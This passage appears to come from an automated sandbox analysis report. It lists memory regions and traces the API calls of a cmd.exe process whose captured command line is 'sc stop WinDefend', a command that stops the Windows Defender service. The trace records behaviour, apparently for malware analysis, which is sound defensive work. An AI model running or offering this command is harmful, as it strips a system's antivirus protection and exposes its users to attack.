0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 420 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 421 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 422 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 423 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 424 start_va = 0x4a510000 end_va = 0x4a55bfff entry_point = 0x4a51829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 425 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 426 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 427 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 428 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 429 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 430 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 431 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 432 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 433 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 434 start_va = 0x3d0000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 435 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 436 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 437 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 736 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 737 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 738 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 739 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 740 start_va = 0x590000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 741 start_va = 0x74c80000 end_va = 0x74c86fff entry_point = 0x74c81230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 742 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 743 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 744 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 745 start_va = 0x76430000 end_va = 0x7652ffff entry_point = 0x7644b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 746 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 747 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 748 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 749 start_va = 0x76e20000 end_va = 0x76eaffff entry_point = 0x76e36343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 750 start_va = 0x76f00000 end_va = 0x76f9cfff entry_point = 0x76f33fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 751 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 752 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 753 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 754 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 755 start_va = 0x77670000 end_va = 0x77679fff entry_point = 0x776736a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 756 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 757 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 758 start_va = 0x690000 end_va = 0x817fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 759 start_va = 0x767d0000 end_va = 0x7689bfff entry_point = 0x767d168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 760 start_va = 0x768a0000 end_va = 0x768fffff entry_point = 0x768b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 761 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 762 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 763 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 764 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 765 start_va = 0x820000 end_va = 0x9a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 766 start_va = 0x9b0000 end_va = 0x1daffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 767 start_va = 0x1db0000 end_va = 0x20f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001db0000" filename = "" Region: id = 930 start_va = 0x2100000 end_va = 0x23cefff entry_point = 0x2100000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 21 os_tid = 0xa48 [0021.070] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f84c | out: lpSystemTimeAsFileTime=0x28f84c*(dwLowDateTime=0x1428ff20, dwHighDateTime=0x1d35d7b)) [0021.070] GetCurrentProcessId () returned 0xa44 [0021.070] GetCurrentThreadId () returned 0xa48 [0021.070] GetTickCount () returned 0x14642 [0021.070] QueryPerformanceCounter (in: lpPerformanceCount=0x28f844 | out: lpPerformanceCount=0x28f844*=323584259) returned 1 [0021.077] GetModuleHandleA (lpModuleName=0x0) returned 0x4a510000 [0021.396] __set_app_type (_Type=0x1) [0021.396] __p__fmode () returned 0x76d831f4 [0021.396] __p__commode () returned 0x76d831fc [0021.396] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5321a6) returned 0x0 [0021.396] __getmainargs (in: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c, _DoWildCard=0, _StartInfo=0x4a534140 | out: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c) returned 0 [0021.396] GetCurrentThreadId () returned 0xa48 [0021.396] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa48) returned 0x60 [0021.397] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0021.397] GetProcAddress (hModule=0x76a20000, lpProcName="SetThreadUILanguage") returned 0x76a4a84f [0021.397] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.397] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0021.397] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f7dc | out: phkResult=0x28f7dc*=0x0) returned 0x2 [0021.397] VirtualQuery (in: lpAddress=0x28f813, lpBuffer=0x28f7ac, dwLength=0x1c | out: lpBuffer=0x28f7ac*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0021.397] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f7ac, dwLength=0x1c | out: lpBuffer=0x28f7ac*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0021.397] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f7ac, dwLength=0x1c | out: lpBuffer=0x28f7ac*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0021.397] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f7ac, dwLength=0x1c | out: lpBuffer=0x28f7ac*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0021.397] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f7ac, dwLength=0x1c | out: lpBuffer=0x28f7ac*(BaseAddress=0x290000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x130000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0021.397] GetConsoleOutputCP () returned 0x1b5 [0021.397] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0021.398] SetConsoleCtrlHandler (HandlerRoutine=0x4a52e72a, Add=1) returned 1 [0021.398] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.398] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0021.398] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.398] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0021.398] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.398] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0021.398] _get_osfhandle (_FileHandle=0) returned 0x3 [0021.398] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0021.399] _get_osfhandle (_FileHandle=0) returned 0x3 [0021.399] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0021.399] GetEnvironmentStringsW () returned 0x5a2030* [0021.399] FreeEnvironmentStringsW (penv=0x5a2030) returned 1 [0021.399] GetEnvironmentStringsW () returned 0x5a2030* [0021.399] FreeEnvironmentStringsW (penv=0x5a2030) returned 1 [0021.399] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e74c | out: phkResult=0x28e74c*=0x68) returned 0x0 [0021.400] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e754, lpData=0x28e758, lpcbData=0x28e750*=0x1000 | out: lpType=0x28e754*=0x0, lpData=0x28e758*=0x0, lpcbData=0x28e750*=0x1000) returned 0x2 [0021.400] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e754, lpData=0x28e758, lpcbData=0x28e750*=0x1000 | out: lpType=0x28e754*=0x4, lpData=0x28e758*=0x1, lpcbData=0x28e750*=0x4) returned 0x0 [0021.400] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e754, lpData=0x28e758, lpcbData=0x28e750*=0x1000 | out: lpType=0x28e754*=0x0, lpData=0x28e758*=0x1, lpcbData=0x28e750*=0x1000) returned 0x2 [0021.400] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e754, lpData=0x28e758, lpcbData=0x28e750*=0x1000 | out: lpType=0x28e754*=0x4, lpData=0x28e758*=0x0, lpcbData=0x28e750*=0x4) returned 0x0 [0021.400] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e754, lpData=0x28e758, lpcbData=0x28e750*=0x1000 | out: lpType=0x28e754*=0x4, lpData=0x28e758*=0x40, lpcbData=0x28e750*=0x4) returned 0x0 [0021.400] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e754, lpData=0x28e758, lpcbData=0x28e750*=0x1000 | out: lpType=0x28e754*=0x4, lpData=0x28e758*=0x40, lpcbData=0x28e750*=0x4) returned 0x0 [0021.400] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e754, lpData=0x28e758, lpcbData=0x28e750*=0x1000 | out: lpType=0x28e754*=0x0, lpData=0x28e758*=0x40, lpcbData=0x28e750*=0x1000) returned 0x2 [0021.400] RegCloseKey (hKey=0x68) returned 0x0 [0021.400] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e74c | out: phkResult=0x28e74c*=0x68) returned 0x0 [0021.400] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e754, lpData=0x28e758, lpcbData=0x28e750*=0x1000 | out: lpType=0x28e754*=0x0, lpData=0x28e758*=0x40, lpcbData=0x28e750*=0x1000) returned 0x2 [0021.400] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e754, lpData=0x28e758, lpcbData=0x28e750*=0x1000 | out: lpType=0x28e754*=0x4, lpData=0x28e758*=0x1, lpcbData=0x28e750*=0x4) returned 0x0 [0021.400] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e754, lpData=0x28e758, lpcbData=0x28e750*=0x1000 | out: lpType=0x28e754*=0x0, lpData=0x28e758*=0x1, lpcbData=0x28e750*=0x1000) returned 0x2 [0021.400] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e754, lpData=0x28e758, lpcbData=0x28e750*=0x1000 | out: lpType=0x28e754*=0x4, lpData=0x28e758*=0x0, lpcbData=0x28e750*=0x4) returned 0x0 [0021.400] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e754, lpData=0x28e758, lpcbData=0x28e750*=0x1000 | out: lpType=0x28e754*=0x4, lpData=0x28e758*=0x9, lpcbData=0x28e750*=0x4) returned 0x0 [0021.400] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e754, lpData=0x28e758, lpcbData=0x28e750*=0x1000 | out: lpType=0x28e754*=0x4, lpData=0x28e758*=0x9, lpcbData=0x28e750*=0x4) returned 0x0 [0021.400] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e754, lpData=0x28e758, lpcbData=0x28e750*=0x1000 | out: lpType=0x28e754*=0x0, lpData=0x28e758*=0x9, lpcbData=0x28e750*=0x1000) returned 0x2 [0021.400] RegCloseKey (hKey=0x68) returned 0x0 [0021.400] time (in: timer=0x0 | out: timer=0x0) returned 0x5a0b3db4 [0021.400] srand (_Seed=0x5a0b3db4) [0021.400] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C sc stop WinDefend" [0021.401] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C sc stop WinDefend" [0021.401] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0021.401] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5a2038, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0021.401] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0021.401] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0021.401] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0021.401] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0021.401] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0021.401] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0021.401] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0021.401] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0021.401] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0021.401] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0021.401] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0021.401] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0021.401] GetEnvironmentStringsW () returned 0x5a2248* [0021.402] FreeEnvironmentStringsW (penv=0x5a2248) returned 1 [0021.402] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0021.402] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0021.402] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0021.402] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0021.402] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0021.402] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0021.402] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0021.402] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0021.402] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0021.402] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0021.402] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f518 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0021.402] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x28f518, lpFilePart=0x28f514 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28f514*="Desktop") returned 0x25 [0021.402] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0021.402] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f294 | out: lpFindFileData=0x28f294) returned 0x5a1eb0 [0021.402] FindClose (in: hFindFile=0x5a1eb0 | out: hFindFile=0x5a1eb0) returned 1 [0021.402] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x28f294 | out: lpFindFileData=0x28f294) returned 0x5a1eb0 [0021.402] FindClose (in: hFindFile=0x5a1eb0 | out: hFindFile=0x5a1eb0) returned 1 [0021.402] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0021.402] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x28f294 | out: lpFindFileData=0x28f294) returned 0x5a1eb0 [0021.403] FindClose (in: hFindFile=0x5a1eb0 | out: hFindFile=0x5a1eb0) returned 1 [0021.403] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0021.403] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0021.403] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0021.403] GetEnvironmentStringsW () returned 0x5a40b8* [0021.403] FreeEnvironmentStringsW (penv=0x5a40b8) returned 1 [0021.403] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0021.403] GetConsoleOutputCP () returned 0x1b5 [0021.403] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0021.404] GetUserDefaultLCID () returned 0x409 [0021.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a534950, cchData=8 | out: lpLCData=":") returned 2 [0021.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f658, cchData=128 | out: lpLCData="0") returned 2 [0021.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f658, cchData=128 | out: lpLCData="0") returned 2 [0021.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f658, cchData=128 | out: lpLCData="1") returned 2 [0021.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a534940, cchData=8 | out: lpLCData="/") returned 2 [0021.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a534d80, cchData=32 | out: lpLCData="Mon") returned 4 [0021.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a534d40, cchData=32 | out: lpLCData="Tue") returned 4 [0021.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a534d00, cchData=32 | out: lpLCData="Wed") returned 4 [0021.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a534cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0021.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a534c80, cchData=32 | out: lpLCData="Fri") returned 4 [0021.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a534c40, cchData=32 | out: lpLCData="Sat") returned 4 [0021.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a534c00, cchData=32 | out: lpLCData="Sun") returned 4 [0021.404] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a534930, cchData=8 | out: lpLCData=".") returned 2 [0021.404] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a534920, cchData=8 | out: lpLCData=",") returned 2 [0021.405] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0021.406] GetConsoleTitleW (in: lpConsoleTitle=0x5a2dc0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0021.406] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0021.406] GetProcAddress (hModule=0x76a20000, lpProcName="CopyFileExW") returned 0x76a53b92 [0021.406] GetProcAddress (hModule=0x76a20000, lpProcName="IsDebuggerPresent") returned 0x76a34a5d [0021.406] GetProcAddress (hModule=0x76a20000, lpProcName="SetConsoleInputExeNameW") returned 0x76a4a79d [0021.406] _wcsicmp (_String1="sc", _String2=")") returned 74 [0021.406] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0021.406] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0021.406] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0021.407] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0021.407] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0021.407] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0021.407] GetConsoleTitleW (in: lpConsoleTitle=0x28f350, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0021.408] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0021.408] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0021.408] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0021.408] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0021.408] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0021.408] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0021.408] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0021.408] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0021.408] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0021.408] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0021.408] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0021.408] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0021.408] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0021.408] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0021.408] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0021.408] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0021.408] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0021.408] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0021.408] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0021.408] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0021.408] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0021.408] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0021.408] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0021.408] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0021.408] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0021.408] _wcsicmp 